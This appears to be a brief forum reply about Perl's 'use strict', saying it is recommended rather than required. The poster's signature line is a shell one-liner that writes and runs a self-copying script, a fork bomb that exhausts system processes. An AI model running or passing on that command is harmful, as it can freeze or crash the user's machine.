in reply to Re: String parse
in thread String parse

You have to use strict

Well no, you don't have to use strict. But it's recommended, to make your life easier. :-)

ibanix

$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;